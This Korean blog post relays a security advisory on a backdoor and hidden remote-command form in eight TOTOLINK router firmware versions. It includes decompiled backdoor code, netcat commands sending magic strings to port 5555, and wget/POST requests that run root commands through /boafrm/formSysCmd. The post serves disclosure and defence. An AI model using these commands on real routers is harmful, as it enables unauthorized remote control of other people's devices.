포스팅 내용

국내외 보안동향

[해외보안동향] TOTOLINK 라우터에서 백도어 발견!

TOTOLINK 라우터에서 백도어 발견!

Backdoor and RCE found in 8 TOTOLINK router models Product Description


라우터 TOTOLINK에서 백도어가 발견되었습니다. TOTOLINK는 국내에서 큰 사랑을 받고 있는 ipTime이 중국 시장에 진출하면서 출시한 브랜드입니다. 테스트를 해 본 결과 최소 8개 이상의 라우터 모델에서 백도어가 발견되었습니다. (펌웨어는 모두 totolink.net 및 totolink.cn 에서 다운로드 받았습니다.)


※ 본 포스팅에서 다루는 백도어는 TOTOLINK 라우터에 존재하는 취약점으로, 현재 국내에서 출시되고 있는 ipTime에서도 해당 취약점이 존재하는지는 아직 확인되지 않았습니다. 


백도어가 존재하는 펌웨어 버전


 

  A850R-V1 : 최신 펌웨어 TOTOLINK-A850R-V1.0.1-B20150707.1612.web

  F1-V2 : 최신 펌웨어 F1-V2.1.1-B20150708.1646.web

  F2-V1 : 최신 펌웨어 F2-V2.1.0-B20150320.1611.web

  N150RT-V2 : 최신 펌웨어 TOTOLINK-N150RT-V2.1.1-B20150708.1548.web

  N151RT-V2 : 최신 펌웨어 TOTOLINK-N151RT-V2.1.1-B20150708.1559.web

  N300RH-V2 : 최신 펌웨어 TOTOLINK-N300RH-V2.0.1-B20150708.1625.web

  N300RH-V3 : 최신 펌웨어 TOTOLINK-N300RH-V3.0.0-B20150331.0858.web

  N300RT-V2 : 최신 펌웨어 TOTOLINK-N300RT-V2.1.1-B20150708.1613.web

 


WAN IP로 변조된 request를 보내면, 공격자는 자신의 웹 페이지에서 HTTP 원격관리화면을 열어볼 수 있습니다. 또한 이 HTTP원격관리화면에서 hidden/boafrm/formSysCmd 형식의 원격실행코드를 통하여 인증을 우회할 수도 있습니다. 현재까지 약 5만대가 넘는 라우터가 해당 백도어의 영향을 받는 것으로 추정됩니다.  



백도어 상세내용


라우터가 시작되면, int.d 스크립트는 /bin/skt 바이너리 문서를 실행합니다. 



  cat etc/init.d/rcS

  [...]

  # start web server

  boa

  skt&

 


skt파일은 MIPS 환경의 클라이언트/서버 역할을 하는 바이너리며, 사용 인자값은 아래와 같습니다.



  server: ./skt

  client: ./skt host cmd

 


QEMU를 이용하면, 이 바이너리를 x86_64 기기에서도 사용할 수 있습니다 : sudo chroot . ./qemu-mips-static ./bin/skt


skt 실행시 별다른 인자값이 없다면 5555 포트를 사용하는 프로세스가 활성화 되면서, 에코서버의 역할만 하게 됩니다.만약 인자값이 존재한다면 인자값에 따른 명령을 5555포트를 통해 전달 할 수 있습니다. skt의 주요 기능은 아래와 같습니다.



   TcpClient :  TCP클라이언트

  TcpServer : 에코 서버

 


TcpClient : hel, xasf, oki, xasf 혹은 bye, xasf이 포함된 TCP패킷을 보낼 것입니다. 이는 어떠한 인자값을 쓸 것인지를 결정해줍니다. (1,2,3)

TcpServer : tcp/5555의 에코서버를 스니핑 하기위해 사용되며사용자로부터 제공되는 스트링("hel,xasf", "oki,xasf")을 비교합니다



Sub_400B50 함수의 백도어코드



  int32_t sub_400B50(int32_t a1, char *str, int32_t a3, int32_t a4, int32_t a5) {   

  if (strcmp(str, "hel,xasf") == 0) {

          system("iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT");

      } else {

          if (strcmp(str, "oki,xasf") == 0) {

              system("iptables -D INPUT -p tcp --dport 80 -i eth1 -j ACCEPT");

          }

      }

      [...]

  }



이 함수는 사용자의 지정된 스트링을 비교하고, 두개의 하드코딩된 스트링을 system()에서 실행시키는 역할을 합니다. TOTOLINK 기기상에서 동작하는 바이너리 분석을 통하여, 서버모드에서 system() 함수에 의하여 백그라운드에서 실행되는  3가지 명령을 확인할 수 있었습니다. 


1) "hel,xasf"를 디바이스에 보냄으로, 디바이스는 아래와 같은 명령 실행 


 iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT 


관리자 인터페이스(http포트) 허용 정책 추가 


2) "oki,xasf"를 디바이스에 보냄으로, 디바이스는 아래와 같은 명령 실행 


 iptables -D INPUT -p tcp –dport 80 -i eth1 -j ACCEPT 


 관리자 인터페이스(http포트) 허용 정책 삭제


3) "bye,xasf"를 디바이스에 보냄으로, 디바이스는 아무것도 못하는 상태가 됨


백도어 중에서 iptables명령 코드를 보면 인터페이스가 "eth1"으로 하드코딩 되어있는 것을 확인할 수 있습니다. WAN IP는 eth1 인터페이스를 사용 하기에, DHCP 및 Static IP를 사용하는 디바이스에만 영향을 끼치며, PPPoE연결에는 영향을 미치지 않는다고 볼 수 있습니다.



  "totolink# ifconfig

  ppp0      Link encap:Point-to-Point Protocol  

            inet addr:X.X.X.X  P-t-P:X.X.X.X  Mask:255.255.255.255

            UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1438  Metric:1

            RX packets:17308398 errors:0 dropped:0 overruns:0 frame:0

            TX packets:2605290 errors:0 dropped:0 overruns:0 carrier:0

            collisions:0 txqueuelen:64 

            RX bytes:2803138455 (2.6 GiB)  TX bytes:277402492 (264.5 MiB)bye,xasf"




공격자는 간단한 netcat명령을 통하여 백도어를 테스트 해 볼 수 있습니다. 


1) HTTP 원격관리자 인터페이스 실행 


echo -ne "hel,xasf" | nc <ip> 5555


2) HTTP 원격관리자 인터페이스 종료 


echo -ne "oki,xasf" | nc <ip> 5555 


3) 취약점 존재 여부 확인



  echo -ne "GET / HTTP/1.1" | nc <ip> 5555

  if you see "GET / HTTP/1.1" in the answer, you likely detected a vulnerable router.




원격관리자 페이지 중 원격명령을 실행할 수 있는 취약점


최신 펌웨어에서 숨겨진 폼이 있는데 이를 이용하면 공격자가 root권한으로 명령을 실행할 수 있습니다. 



  POST /boafrm/formSysCmd HTTP/1.1

  sysCmd=<cmd>&apply=Apply&msg=



공격자는 wget을 이용하여 원격으로 명령어를 실행시킵니다. 


wget --post-data='sysCmd=<cmd>&apply=Apply&msg=' http://ip//boafrm/formSysCmd


예를들어, 관리자 인터페이스에 아래와 같은 HTTP request를 보내면, 원격에서 해당 디바이스를 재부팅 시킬 수 있습니다. 



  POST /boafrm/formSysCmd HTTP/1.1

  sysCmd=reboot&apply=Apply&msg=



아래는 wget명령어를 이용한 재부팅 명령입니다. 


wget --post-data='sysCmd=reboot&apply=Apply&msg=' http://ip//boafrm/formSysCmd  



※ 참고 : 

http://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html



티스토리 방명록 작성
name password homepage